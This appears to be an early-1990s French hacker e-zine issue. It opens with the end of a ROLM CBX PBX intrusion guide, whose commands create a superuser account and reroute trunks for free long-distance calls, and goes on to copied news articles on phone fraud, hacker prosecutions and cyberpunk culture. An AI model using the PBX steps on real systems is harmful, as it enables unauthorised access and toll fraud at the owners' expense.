RE-TYPE PASSWORD: PASSWORD
VERB: ALL
Cette srie de commandes vous permet de crer un acompte
"Superusager" avec un accs TOTAL au systme.
1.80
- Accder
la liste du Hardware -
Vous tes probablement en train de vous demander: "Pourquoi est-ce
que je devrais m'emmerder avec le matos du systme", right? Que
diriez-vous d'avoir un dialout
9600 bauds? Cool, non? Peu
importe, je vais vous montrer comment avoir accs au systme, mais
vous allez devoir vous dbrouiller par vous-mme pour rediriger le
modem du systme. Je n'ai pas le temps ni les connaissance
ncessaires sur le ROLM-CBX pour vous le montrer avec certitude.
Alors, voici pour avoir la liste du hardware...
Vous entrez la commande suivante, toujours du ICI :
% LIST DATA_DEVICE
PAD: ALL
Vous allez immdiatement obtenir la liste de tous les modems et de
tous les terminaux branchs sur le systme. En utilisant la
commande MODIFY, vous devriez normalement pouvoir vous dbrouiller
pour changer le setting du modem pour qu'il puisse composer
partir du numro de PBX que vous avez trouv plus tt.
1.90
- Accder aux lignes Data et Setup -
Une des hypothses sur lesquelles j'ai travaill est la suivante:
Comment peut-on rediriger une ligne de la compagnie vers un numro
LD? J'ai trouv la rponse...
% LIST TRUNK
PAD: ALL
Cette commande va vous donner la liste des trunks. Ensuite, vous
faites :
% MODIFY TRUNK
NOUN: <Le trunk choisi>
Ensuite, entrez toutes les options que vous dsirez. L'une de
celles-ci sera un renvoi d,appel vers un autre numro, LD si
possible. En fait, programmez ici votre numro de BBS LD ou de
communication vocale, de faon
ce que la connexion soit toujours
automatique. Votre appel vers ce numro sera dsormais gratuit...
2.00
- Conclusion -
Ceci tait mon premier, et probablement mon dernier, texte sur le
phreaking pur et dur. Alors, amusez-vous, et surtout rappelez-vous:
si vous ne russissez pas du premier coup... essayez encore. Vous
pourrez toujours cracker un systme si vous y mettez assez
d'efforts.
Si vous avez un problme, une suggestion, ou un beau petit truc
me communiquer sur les ROLM/CBX, appelez mon board :
The Dialup
514-XXX-XXXX (dsol, vous devrez demander autour de vous pour le
numro -Blitz)
1200 to 14.4k v32/bis
NUP: CYBERNETIC LSD
UPI East Coast Site
NPC Site
Ou appelez ma VMB (Sujet
changement)
1-800-521-2070 *168 (Si vous n'entendez pas du reggae ou un beat
d'enfer, ce n'est pas la mienne)
Et souvenez-vous: Les Fonecos ont ANI et vont, si elles le peuvent,
l'utiliser pour vous botter le cul jusqu'en prison! Vous allez vous
retrouver sur la paille humide des cachots tellement vite que vous
ne saurez jamais ce qui s'est pass! Paix et Anarchie!
Greetings: Mechanix (pour m'avoir introduit aux CBX), Telephatic
Slayer, The Lost Avenger, Arch Bishop, Ratpack (fine AE system you
got), G0DMOTHER, Rock Steady, The Darkman (O que tu sois. Je sais,
mais...), Atreid Bevatron et toute la gang de NPC, Tracer (pour son
fichier original sur les CBX), et tous ceux que j'aurais pu
oublier...
Grunts: Avis
tous les NARCS qui lisent ceci: o croyez-vous que
a vous conduit, tous vos enfantillages? Au nom du ciel, essayez de
penser
l'impact de vos petites vendettas personnelles contre les
membres de la communaut H/P. Vous croyez que vous tes un dur
parce que vous avez russi
faire draper ce pirate-ci ou celui-
l
? Comment vous sentiriez-vous si quelqu'un vous traitait de la
sorte? Probablement ben mal... Nous devons travailler en quipe, et
ne pas partir de guerre les uns contre les autres.
Silicon Phreaker / UPI. Word Up.
[Traduction: Blitzkreig]
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
POUR MIEUX VOUS SERVIR, NOUS PROCEDONS A UNE AUGMENTATION
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
READ THE NEWS, DON'T BELIEVE THE HYPE
L'actualit dans les mdias
par
-=ThE PoSSe=-
Leeched from LA PRESSE - Le samedi 13 fvrier 1993
DIEU REOIT-IL DES FAX?
Associated Press -Jrusalem-
Des centaines de personnes ont envoy par fax des messages
Dieu
par le biais d'une compagnie de tlphone isralienne, en dpit des
avertissements d'un rabbin pour qui l'envoi de messages ne remplace
pas la prire.
"Nous avons reu entre 100 et 200 demandes par jour pour
placer des messages dans le Mur des Lamentations" depuis l'entre
en vigueur de ce service, prcise un porte-parole de la compagnie
nationale.
Le rabbin Yehuda Getz, responsable du Mur des Lamentations, a
averti que les messages par fax ne dispensaient pas les fidles de
prier.
Les messages sont envoys sur un numro de fax
Jrusalem o
un employ de la compagnie les collecte, les apporte chaque jour au
Mur des Lamentations et les place dans les fissures. La plupart
proviennent de pays trangers. (Le numro, payant, est le suivant:
972-2-612222)
-30-
[Blitz- En passant, je me suis renseign et le service est gratuit.
Vous ne payez que le LD... et encore. Une question, cependant: si
j'utilise un PBX HACK ou un numro de carte d'appel VOLE pour
demander une faveur
Dieu, est-ce que je vais me ramasser en
ENFER? J'angoisse, l
!]
Leeched from TNE NEW YORK TIMES, 26 janvier 93
GOING UNDERCOVER IN THE COMPUTER UNDERWORLD
Law-Enforcement Officiers Quietly Tap Into the Illegal Activities
of
Cyberspace
by Ralph Blumenthal
He patrols the back alleys of cyberspace at the edge of the
electronic frontier. Traveling on beams of electrons, he is
invisible, formless - the ultimate undercover agent.
He's "Phrackr Trakr" of the High-Tech Crime Network. But don't
look for him in comic books or the video store. He's real.
His beat takes in the thousands of computer bulletin boards
where anyone with a computer, a modem and a phone can dial up and
exchange information, or even start a new bulletin board. Usually,
the subject is as innocuous as a computer game program, a receipe
or pet grooming. But increasingly, the authorities say, the
bulletin boards have become underground marketplaces for stolen
telephone access codes and credit card numbers, along with child
pornography and other contraband. Now, law-enforcement agencies
have stepped up counterattacks, including computer-based stings.
That's the passion of Phrackr Trakr, (pronounced FRACK-er
TRACK-er), an organized-crime investigator, founder of a network of
police computer buffs that now spans 28 states, and self-proclaimed
scourge of "hackers" who break into computer networks, "phreakers"
who steal telephone services, and "phrackers," who are a
combinaison of both.
In his newsletter called "FBI" (Find um, Bust um, Incarcerate
um), he warned:
"Every move you make,
Every breath you take,
We'll be watching you."
Brazenly, he uploaded the taunt onto bulletin boards in June in
an effort, as he wrote, to sow "anarchy, chaos, mistrust and fear"
in the "phracker community."
Boyish, with closely cropped hair and a penchant for suspenders
and rakish double-breasted suits, the 36-year-old investigator
works in the organized crime, racketeering and narcotics bureau of
a large law-enforcement agency in the East.
Like other undercover agents whose success and safety hinge on
an ability to blend in with their targets even though they chafe at
the anonymity of their work, he was eager to draw attention to his
operations, provided his identity was withheld.
An Electronic Wall
~~~~~~~~~~~~~~~~~~
While infiltrating electronic bulletin boards, and
investigating computer crime is part of his job, he said, the
High-Tech Crime Network that he organized last year to educate
other officiers around the country is his own project, for which
he has spent some $4,000 of his own money on computer equipement
and phone bills.
Though his investigations have yet to yield arrests, he said he
is studying nine boards and building cases with officiers in three
other states.
"It takes time," he said. "You don't just buy one thing and
arrest them. They'd know you were a cop. You buy things over time
and make several arrests." While the Secret Service and the Federal
Bureau of Investigation are also conducting investigations, he
said, local law enforcement also has jurisdiction.
Others corroborated his account. His information jibes,
furthermore, with well-documented efforts by law-enforcement
agencies nationwide to penetrate the perhaps 10 percent of the
nation's estimated 30,000 electronic bulletin boards where computer
criminals traffic in stolen information, child pornography, poison
recipes and bomb-making instructions.
"I want to make cops aware of high-tech crime," he said as he
typed at a home computer recently reading his electronic mail from
other officiers and leaving messages on bulletin boards that
offered stolen credit card numbers and telephone calling codes.
These were not pranks of teen-age computer whizzes, he said, "This
is an organized criminal activity."
"The victims are everybody," he said. "We all end up paying for
it."
Richard Petillo, manager of corporate security for AT&T, said
such fraud now costs the industry, and thereby customers, an
estimated $2 billion a year and continues to grow. "It's an
epidemic, let's face it," he said. "Criminals are constantly
working at ways to get around our controls. We liken it to a chess
game."
Bruce Sterling, a chronicler of the computer wars and author of
"The Hacker Crackdown" (Bantam, 1992), concluded that while
mischievous intrusions into computer networks were declining,
"electronic fraud, especially telecommunications crime, is growing
by leaps and bounds." This despite a crackdown by several agencies
around the nation in 1990 (Operation Sun-Devil) that resulted in
the seizure of some 40 computers and 23,000 floppy disks.
Threat to Phone Companies
~~~~~~~~~~~~~~~~~~~~~~~~~
To telecommunications giants like AT&T, M.C.I. and Sprint, the
primary fraud is theft of long-distance calling-card numbers. But
they have the technology to detect sudden changes in customer
calling patterns and can invalidate a card within hours. More
difficult to detect are break-ins to a company's phone system -
called a private branch exchange, or PBX. These thefts can afford
free outside calling at the company's expense and can escape notice
until the bill arrives. Among recent victims were the financially
struggling New York Post, which suffered a $40,000 loss.
Toward the end of a month, as the likelihood of their detection
rises, "phreakers" often post PBX access codes on electronic
bulletin boards, allowing wider exploitation and muddying the trail
for investigators. The techniques for such electronic break-ins are
widely disseminated on the bulletin boards.
In addition, many experts say, the more secretive boards have
become forums for pedophiles and other sexual predators who also
inhabit cyberspace, that unfixable geography where disembodied
strangers known only by their pseudonyms, or "handles," chat by
computer and phone lines. Pornography, even moving pictures from
overseas, are stored as files that can be dowloaded by minors into
home computers at will.
Chief Alfred O. Olsen of the Warwick Township Police Department
in Litiz, Pa., who has worked with the police high-tech crime group
and its founder, said in a recent report that he became aware of
the nefarious uses of some bulletin boards as a result of a rape
case in which the suspect met victims through a computer bulletin
board.
To get onto a bulletin board, a computer user needs only a
communications program like Crosstalk and a modem that will send
and receive signals over the phone line. Each board has its own
phone number and is usually maintained by its originator, a system
operator who sets the rules for access and coordinate the message
traffic. Each board commonly offers the phone numbers of many other
boards, as well as programs for starting yet other boards. But
so-called underground boards offering illicit services require
secret passwords, usually granted only to those who attend
face-to-face meetings intended to weed out the police.
The Limits of Expression
~~~~~~~~~~~~~~~~~~~~~~~~
Computer civil-libertarians like the Electronic Frontier
Foundation counter that the police typically have difficulty
differentiating between criminal schemes and constitutionaly
protected free speech.
But Phrackr Trakr said he understood the distinction. "If you
want to write how to kill your parents, that's O.K.," he said,
citing a bulletin board "phile" on how to dispose of a murdered
parent's body. "But selling credit cards is something else."
Learning the idioms was the first step in infiltrating a
bulletin board system, he said. He used a software program on an
IBM clone and a telephone modem to log onto one of several
clandestine boards; he did this by using false identification and
access passwords he had acquired by satisfying a series of
questions testing his authenticity.
He was scanning the messages when the systems operator who
policed the board broke in:"What's up need any help?"
"Yo dude," he typed out, "looking fer ATT's got any?"
The operator provided the handle, or nickname, of someone who
might have credit-card calling numbers.
Phrackr Trakr left a message for him and addressed the
operator.
"Thanx for the codez," he typed, adding:"You only one getting any."
If future transactions proved rewarding, he said, he would try
to lure the supplier to a face-to-face meeting where he could be
arrested by local authorities on other charges, safe-guarding the
confidentiality of the undercover exchange.
A Hacker's Attitude
~~~~~~~~~~~~~~~~~~~
He rummaged through other boards, finding files on how to turn
household chemicals into deadly poisons, how to build an "Assassin
Box" to send a supposedly lethal power surge through a telephone
line, and how to use a tone dialer to make free calls from certain
coins telephones.
Then it was time to log onto his own bulletin board - protected
by his own high-security measures - to check the mail from fellow
members of the Hi-Tech Crime Network.
Tim left a message saying he had found that a bulletin board he
was investigating concealed an even more interesting underground
board. "I'm in the process of getting elite access now," he wrote.
"Hope it works."
But, Tim wanted to know, what if he was asked to provide card
numbers in return?
"Always put them on the defensive," counseled Phrackr Trakr.
"Let them know you're interested but come across as being cautious.
They will understand that. Upload some of the files you got from
this board and that should give you some credibility. Have an
attitude. Most hackers/phreakers do."
- 30 -
Damn. It seems that this guy has an orgasm everytime he logs on an
underground board.
.Subhuman.
Leeched from LE JOURNAL BELL vol. 29 #4 - 1er fvrier 93
Fraudes interurbaines
FACTURES SALEES AU SAGUENAY-LAC-ST-JEAN
En janvier dernier, des clients de la rgion Chicoutimi-
Jonquire ont eu toute une surprise en recevant leur relev de
compte mensuel. Pour certains la facture s'levait
plus de 5 000
$ en frais d'interurbain: des appels
destination de tous les
coins du monde qu'ils n'avaient vraisemblablement jamais effectus.
"Ces gens ont t victimes d'un fraudeur particulirement fut
qui svit depuis environ six mois et dont on vient de retrouver la
trace", rapporte Jacques Desjardins, chef divisionnaire adjoint -
sret.
L'homme, qui opre
partir de New-York, appelle
systmatiquement tous les numros de tlphone d'une rgion. Il se
fait passer pour un employ du Bell et, sous un faux prtexte,
s'enquiert dans un trs bon franais du numro d'identification
personnel (NIP) qui apparat sur la carte d'appel de ses
interlocuteurs. Il revend ensuite cette information aux tats-unis
ou en Europe pour 200, 300 $ et plus. Il serait,
lui seul,
responsable pour environ 500 000 $ d'appels interurbains
frauduleux!
"J'insiste sur le fait que JAMAIS un employ de Bell, autre
que le tlphoniste dans le cadre de son travail, ne demande le NIP
un client", prvient Melody Sguin, chef divisionnaire-adjoint -
sret. "Le NIP est un numro confidentiel; les gens ne doivent le
divulguer sous aucun prtexte", renchrit Jacques Desjardins.
La fraude interurbaine est un flau contre lequel il est
difficile de se prmunir. Les membres de la Sret de Bell tiennent
rappeler que tous les intervenants, qu'ils soient des
utilisateurs ou des compagnies de tlphone, doivent faire preuve
de vigilance.
-------
Quelques astuces pour djouer les fraudeurs
Ne divulguez jamais votre NIP
personne d'autre que le
tlphoniste de l'interurbain dans le cadre d'un appel.
Soyez discrets. Ne criez pas votre NIP dans le tlphone et
cachez le clavier lorsque vous le composez.
Dans la mesure du possible, utilisez les tlphones publics
Millnium. Ces appareils sont pourvus d'un lecteur magntique
l'intrieur duquel vous glissez votre carte d'appel. Ainsi,
personne ne peut voir ou entendre votre NIP.
Surveillez vos relevs de compte. Particulirement dans les
grandes entreprises. Les compagnies de tlphone amricaines ne
confirment pas ncessairement les appels facturs
un troisime
numro. Certains fraudeurs facturent leurs appels interurbains au
numro d'une grande entreprise en tablant sur le fait qu'ils se
trouveront noys dans le flot des appels quotidiens.
- 30 -
[Blitz- C'est insultant! Mmes les twits du Bell croient qu'il n'y
a que des Newyorkais qui peuvent frauder! Un pirate du Saguenay
aurait trs bien pu faire la mme chose, en passant par un PBX
situ
New-York, avant d'appeler avec son numro de carte d'appel
vol. C'est probablement se qui s'est produit d'ailleurs, sauf que
les zoufs de la CHURETE du BELLE croient tenir leur fraudeur... fat
chance...]
Leeched from GB-Justice - 23/02/1993
Londres, 23 fv. (AFP) - Un jeune passionn d'informatique qui a
sem le chaos pendant au moins deux ans dans des systmes
informatiques de la CEE, comparat devant la justice
Londres,
accus notamment d'accs non-autoris
du matriel informatique et
de complot pour obtenir malhonntement des services de
tlcommunications.
Paul Bedworth, 19 ans, a t arrt il y a deux ans lorsqu'une
de ses cibles, l'Universit de Leeds, excde par ses piratages,
est remonte jusqu'
lui. Le jeune homme avait acquis une telle
matrise dans sa partie qu'il tait capable de changer les mots de
code des systmes qu'il piratait, empchant ainsi leurs
utilisateurs autoriss d'y avoir accs.
L'Universit de Leeds est ainsi reste prive de ses
ordinateurs jusqu'
six heures dans une mme journe, en 1991, du
fait des activits du jeune homme, qui oprait
partir d'une
simple console
200 livres (300 dollars) reue en cadeau
14 ans.
Pendant ces sessions, selon l'accusation, Paul Bedworth se
connectait
des systmes au Luxembourg, notamment ceux de la CEE,
en Allemagne, en France, n'pargnant ni l'ordinateur du quotidien
Financial Times, ni des associations mdicales europennes, ni la
Lloyds Bank - sans toutefois en profiter pour effectuer des
oprations bancaires frauduleuses.
Le jeune homme, qui nie les charges retenues contre lui, a
galement t accus d'avoir pirat des lignes tlphoniques, pour
assouvir
moindre frais sa passion informatique. "Priv de
tlphone" par sa mre, il avait tir une ligne, qui passait sous
le tapis de sa chambre, et s'tait connect au terminal des
Tlcommunications britanniques de telle faon que d'autres
abonns, en particulier l'Universit de Manchester, payaient le
gros de ses factures, sa mre n'tant redevable que d'une
communication au tarif local.
Paul Bedworth, qui avait entre 15 et 17 ans
l'poque des
faits, tudie actuellement l'intelligence artificielle de
l'Universit d'Edimbourg.
[Transcriber: Subhuman]
Leeched from
OMNI VOL.15 NO.2
NOVEMBER 1992
SECRETS OF THE CYBERCULTURE
COMPUTER COWBOYS ROAM THE TECHNO-UNDERGROUND
SEEKING INFORMATION - OR JUST WREAKING HAVOC
ARTICLE BY A. J. S. RAYL
® Something's happening here. What it is ain't exactly clear. There's
apunk with a computer over there, tellin'me I got to beware....¯
It's a time-warp scene in some weird science-fiction story as I head
down Telegraph Avenue just outside the Berkeley campus. The smell of
patchouli wafts through the air, overwhelming other scents of burnings
incense. The driving beat of the Doors' "Break on Through" pusates from
a record store - a fitting soundtrack to the movie surrounding me.
Sidewalk merchants are hawking everything from tie-dyed T-shirts to
turquoise jewelry. Me? I'm on a mission -to meet my connectionin the
counterculture. It seems conspucuously like the Sixties. But familiar
sights, sounds, and vibes aside, things have changed. After all, this is
the Nineties. Abbie Hoffman is dead. And no one is attempting to levitate
the Pentagon anymore.
But if you thought the revolution was over, think again - and read
on. These days, a new breed of younf politicized radicals, known as
cyberpunks, roam a techno-underground. Inspired and fueled in part by
ideas emerging from science-fiction literature, these cyberpunks are
computer cowboys riding the trails of cyberspace - a nether world of
bitstreams and databases inside computer networks - circumventing
software barriers in search of information and services or sometimes just
to wreak a little mischievous havoc. They've got the equipment and, they
say, the technical knowhow to slip into virtually any computer system and
affect changes with global ramifications. With the tap of a key, they
claim, they could effectively cripple the economy or shut down
communications systems the world over. If that is true, then cyberpunks
hold the potential for becoming the most powerful coundtercultural force
ever.
The government has taken them seriously. It has launched at least
two major operations, one in 1990 called Operation Sundevil, to quash the
movement. The problem: The consensus in the computer community is these
government agents know considerably less about the technology than the
computer experts and the cyberpunks, a charge government officials deny.
As Secret Service Special Agent John F. Lewis put it, "There are some
very talented infividuals who are unfortunately misdirecting their
energies. But to say they're leaps and bounds ahead of law enforcement
personnel isn't true." Still, so far their efforts, have seemed dubious
at best, serving more to fan the flames of the socio-political fire now
raging over the control of and individual rights in the electronic
frontier. I duck into a coffeehouse and manage, with relative ease, to
spot my connection - one of the hackers for whom the word cyberpunk was
created. he's tall and slender, wearing black jeans and sporting a pair
of John Lennon specs. He has a boyish, almost baby, face, which belies
the brain power it so handsomely covers. His eyes are intese, at times
piercing. Overall, he appears every bit the intellectual anarchist for
which the Berkeley scene is perfect camouflage. He's known in the techno-
underground as Michael Synergy.
Twelve years ago, Synergy was your basic computer nerd. He spent his
time exploring cyberspace, staging his own quiet protests by going where
he wanted, when he wanted. Synergy became so adept at infiltrating
systems that he's become a legend. Todat he remains something of an icon
in the techno-underground.
Synergy evolved - as did cyberpunk - from the late Seventies'hacker
community. "There ware a lot of us playing with the phone systems, and
then slowly we began to find our ways into other networks," says Synergy,
as he takes a sip of tea, adjusts his Lennon specs, and leans back in his
chair. "My whole reason for breaking into systems way back then was to
become educated. At that time, there wasn't a C-compiler on
microcomputers, so I broke into Bell Labs just to learn C." Most hackers
used their talents then, Synergy says, simply to learn. For the most
part, the original hacker crew was apolitical - more interedted in the
machines than in the politics.
As they began traversing software barriers into the secured systems
of major corporations, governement, and military-industrial complexex,
however, that began to change. They gleaned a lot of inside, top-secret
information on just about everything, including covert military
operations. At the age of 14, Synergy, now in his late twenties, managed
to slip into a supposedly secure top-secret computer network run by the
intelligence community and the Department of Defense. The DOD took him
out of cyber circulation and brought him into their circle. He worked for
nearly three years conducting "penetration testing and security design"
for the national Security Agency, Secret Service, and FBI, as well as the
DOD.
Consequently, Synergy became politicized. "it used to be really hard
to find things out, but nowadays systems are so well networked together,
if you know which machine to talk to in the intelligence community, it's
fairly simple to break in," he says. "The work I did for different
government agencies gave me an inside view, and that strengthened my
opinions. It made me very political and very antigovernment. Once you
have access to the system, you begin to clearly see the bars of the
prison we live in."
While Synergy was being politicized, writers on the science-fiction
front were at work writing about such youthful electronic frontier
outlaws. They projected them into dark, desolate, not-so-distant futres
where technology both rules and runs amok, and set them in adventures in
cyberspace where data serves as the landscape and territories are
traversed mathematically, not geographically or physically.
The term cyberpunk was brainstormed back in 1980 by Bruce Bethkeas
the title for a short story he'd written about a computer-hacker gang -
bored suburban kids out to raise hell. Bethke had been hanging around,
playing keyboards on the periphery of the punk New Wave music scene while
working for Radio Shack. "I wanted a word that grokked these punk
attitudes and the technologies," he says. The story, which was published
in the magazine Amazing in 1983, remained obscure - but the title took
seed, first in the science-fiction community and then in the media at
large.
The success of William Gibson's first novel, Neuromancer, published
in 1984, actually launched the cyberpunk on the map of the collective
public consciousness. Set in a future urban dystopia, the novel centers
on Case, a software cowboy for hire. Burned by Japanese microbionics
experts who bonded tiny sacs of a wartime Russian mycotoxin to his artery
walls, Case is suffering a slow death. He finds a man who can cure him,
provided, of course, that he is able to penetrate a highly secured
computer system and acquire the key information. In order to get inside
the various systems, Case links his brain directly to the computer, or,
in the terminology of the novel, "jacks in to the net."
While the word cyberpunk never appears in the Neuromancer text, it
was the catch phrase that reviewers used to define his book ans the new
genre that suddenly seemed to be everywhere. Other cyberpunk-oriented
works by such writers as Bruce Sterling (Schismatrix, Islands in the
Net), Pat cadigan (Mindplayers, Pretty Boy Crossover), and John Shirley
(Eclipse coroca) captured SF fans.
Gibson, whose own early inflences were such "subversive" rock-'n'-
rollers as Lou Reed/Velvet Underground and Steely Dan, had been watching
the puck-music scene with a certain enthusiasm. In fact, he says, the
rebelliousness of puck served as the inspiration, and his own boredom as
the fuel that motivated him to begin work on Neuromancer and numerous
other cyberpunk short storied (many first published in Omni). Gibson
wrote two more cyberpunk-oriented novels - 'Count Zero' and 'Mona Lisa
Overdrive' - and garnered acclaim as the godfather of cyberpunk. It's not
a title, however, that he's assumed.
"It's really just an accident in history," says the author, whose
roots go back to the counterculture of the Sixties. Gibson actually knew
very little about computers and high technology: He pounded out his
cyberpunk works on a 1938 manual typewriter while listening to early
Bruce Springsteen albums. "I didn't set out to start a movement, but for
whatever reason, "he says, "those books of mine have become a rallying
point."
Co-cyber writer Sterling agrees that Gison was in the right place at
the right time. "to some extent, people always credit the messengers,"
says Sterling, whose first nonfiction work, Hacker Crackdown, about the
government's efforts to stop hackers, was published this fall. "We write
books for a purpose - not just to be cute. Science fiction is about
making up weird ideas and throwing them out there. And now all that stuff
we were writing about 'is' out there - loose in the world."
What happened when cyberpunk science fiction hit was a case of life
imitating art. "Suddenly, the concept of cyberspace took hold and
inspired the real hackers, and they began to redirect their efforts in
the technical arena. It gave us a vision of technology's potential," says
Synergy. "most ocmputer enthusiasts and a lot of the hackers are very
thechnical, but not very intouch with the world at large. The difference
is cyberpunks are very technologically capable but at the same time very
worldly, connected to reality and what's going on in the culture."
In ssence, the cyberpunks are to the hackers as yippied were to
hippied - political, savvy, worldly versions of the alternative culture.
They don't hack out in places, but in cyberspaces, communing, often
anonymously, on computer bulletin-board systems or through "zines" -
electronic magazines. While there are several hardcopy magazines devoted
to things cyberpunk - the most popular being 'Mondo 2000' - cyberpunks do
their real business in the net.
"Listen to these titles - Anarchy 'N' Explosives, Bootlegger, Clut
of the Dead Cow Files, Freaker's Bureau International' National Security
Anarchists, Phuck-in Phield Phreakers, Rebel's Riting Guild, and TAP
(Technological Advancement Party) Online, which is actually the
resurrection of Abbie Hoffman's old magazine," says Sterling, leafind
through a compilation of computer sources recently sent to him.
The vast majority of bulletin-board systems and zines, however, are
legal and aboveboard. In 1985, 'the Whole Earth Review' created the
'Whole Earth Lectronic Link, known as the WELL. "While this electronic
medium existed, there was no publicly available community," says founder
Howard Rheingold. "The purpose was to create a public utility to enable
people to build a community and do business online." Current WELL members
include communications pioneers as well as SF authors like Sterling, and,
of course, cyberpunks. Such above-ground efforts signify that cyberpunk
is merging in pop culture, assuming meaning as a lifestyle, a way of
thinking and, hence, a movement whose numbers - at least in terms of
subscribers to the mindset - are beginning to grow.
Central to the cyberpunk viewpoint is the belief that governments -
nation states - are giving way to multinational corporations - global
states. These entities are located not so much in one geographical
location but throughout the world via global networks on the electronic
frontier.
In this electronic landscape, cyberpunks see a future where those
who have information will be separated from thoose who don't. By
disseminating information - be it corporate plans or top-secret
government operations - they believe they can take on self-as-sumed roles
that range from benign socioopolitical watchdogs capable of averting
global opression to anarchists retaliating against corporate greed by
wreaking havoc on computer systems - or as electronic terrorists ready,
willing, and able to take out an enemy simply by shutting down systems.
It comes as no surprise then that the governement is up in arms. In
Secret Service and FBI circles - the government agencies charged with
computer law enforcement - the term cyberpunk has almost come to mean
computer criminal. And cases like the 1988 Internet "worm" have
undoubtedly fed the crackdown fever. Created by 25-year-old Robert
Morris, the worm shut down some 6,500 computers and caused an esimated
$150,000 to $200 million worth of damages to computer systems nationwide.
Because his defense attorneys were able to prove the destruction was
unintentional, Morris was sentenced to a $10,000 fine and 400 community-
service hours.
Since then, there have been several instances of what the hackers
clam are government attempts to suppress the cyberpunk media. Steve
Jackson Games is a case inpoint. Secret Service agents raided this small
Austin-based games manufacturer - publishers of fantasy-role-playing and
board games - in March 1990. They seized computers and a stack of
software disks and ransacked the company's warejouse. Some materieals
seized in the raid, including the game GURPS Cyberpunk, have yet to be
released, and Jackson has filed a civil suit against the government as a
result.
Spurred by this incident, the computer community rallied, holding a
meeting on the WELL in late spring 1990. Mitch Kapor, creator of Lotus 1-
2-3; Apple cofounder Steve Wozniak; Sun Microsystems pioneer John
Gilmore; and computer enthusiast and Grateful Dead soongwriter John Perry
Barlow formed the Electronic Frontier Foundation to protect freedom of
speech and expression in cyberspace.
With the recent arrests of numerous hackers for illegal entry and
data possession, the battles over control of the electronic frontier and
hackers'rights are now being waged in court. One critical issue is
whether information belongs to a given corporation or government or
whether it belongs to the world. for those who are relaying information
through computer networks and zines, here is also the question of First
Amendment rights' or Hackers'Richts. How free is a free press in the
electronic medium? This debate over intellectual freedom isn't entirely
benign. The access to knowledge, like freedom, is risky when absolute.
Things have changed in the hacker community. the first generation of
young computer enthusiasts, now in their twenties, operated from a more
mature, concerned-for-the-future frameof reference. But synergy admits
danger may lie ahead with the new generation of hackers: "The new kids on
the block, the new 14-year-old cast and crew, don't have a very good
handle on morality, knowing what they should and souldn't be doing with
these wonderful tools they
have."
Furthermore, computer technology has outmoded old forms of political
power. "Anyone who was around in the Sixties is aware of the concept that
all political power comes from the barrel of a gun and the power to
control is the power to destroy," Synergy says. "Now, with information
tools, people like me have the capability and the access - because of the
way system is structured - to shut everything down - not just locally,
but globally. And, it's getting worse every day.
Interestingly, Synergy's vision of the future liew on the opposite
end of the cyberpunk spectrum from Gibson's. "I think Gibson is about the
most pessimistic mother fucker I've ever run into," says Synergy. "His
basic premise is that science will be abused, period. I tend to be more
of an optimist: If we were going to blow each other up, we'd have done it
by now. And, actually having been inside and looked around, I seriously
doubt whether we actually could blow ourselves up."
"Well, if you're living in south Central Los Angeles," says Gibson,
"the world is a lot uglier than the world in Neuromancer. And, in some
cases, you'd be very lucky to wind up with the Neuromancer future. It's
hardly the most dystopian vision."
The cyberpunk future is still up for grabs - between utopia and
dystopia. But indications are that the world will be one of corporate
states, moving away from governments of locales to goveernments of
multinational corporations whose increasing monopolization of information
wields more and more power and control over individuals as well as nation
states. The new tools for diplomacy, politics, espionage, and terrotism
will be electronic ones.
While cyberpunk seems to have the potential for being the most
potent, effective, bohemian force ever to take on civilization, its
impact remains to be seen. One thing, however, is certain: CYBERPUNK
ISN'T JUST SCIENCE FICTION ANYMORE.
Leeched from LE JOURNAL BELL - 18 janvier 93
LA MESSAGERIE VOCALE FLIRTE AVEC LA TLCOPIE
Dbut de janvier, FaxCall, un nouvel outil des Systmes de
messagerie vocale intgrs, qui permet d'expdier de la documentation par
tlcopie, faisait son entre chez Bell. Ce service, disponible pour la
clientle externe depuis septembre dernier, est offert
l'interne par
InfoCENTRE.
Son fonctionnement est simple. Quand on appelle une messagerie
vocale quipe de FaxCall, un message indique que de la documentation
crite est disponible sur le tlcopieur. Pour l'obtenir, il n'y a qu'
suivre les consignes que dicte le message.
D'ici la fin du premier trimestre, les employs de Bell seront en
mesure d'obtenir de la documentation tlcopie sur une foule de sujets
qui vont des avantages sociaux aux relations de travail en passant par
toute la gamme des produits et services des Tlboutiques. Et l'quipe
d'InfoCENTRE sera heureuse de crer de nouvelles applications pour les
groupes qui en feront la demande. On peut contacter InfoCENTRE en
composant le (514) 870-4141.
Vous avez envie d'essayer FaxCall? Faites le 870-9156. On vous
expdiera immdiatement une tlcopie de cet article de mme que de la
documentation supplmentaire!
- 30 -
Leeched from LE JOURNAL DE QUBEC - Lundi 8 fvrier 93
LA BELL AFFAIRE!
par
Jean-Philippe Decarie
Pour un grand coup, c'en fut tout un. En annonant, vendredi, qu'elle
comptait dposer une requte auprs du CRTC afin de l'autoriser
hausser
de 50% son tarif de base, Bell Canada a fait mentir l'expression
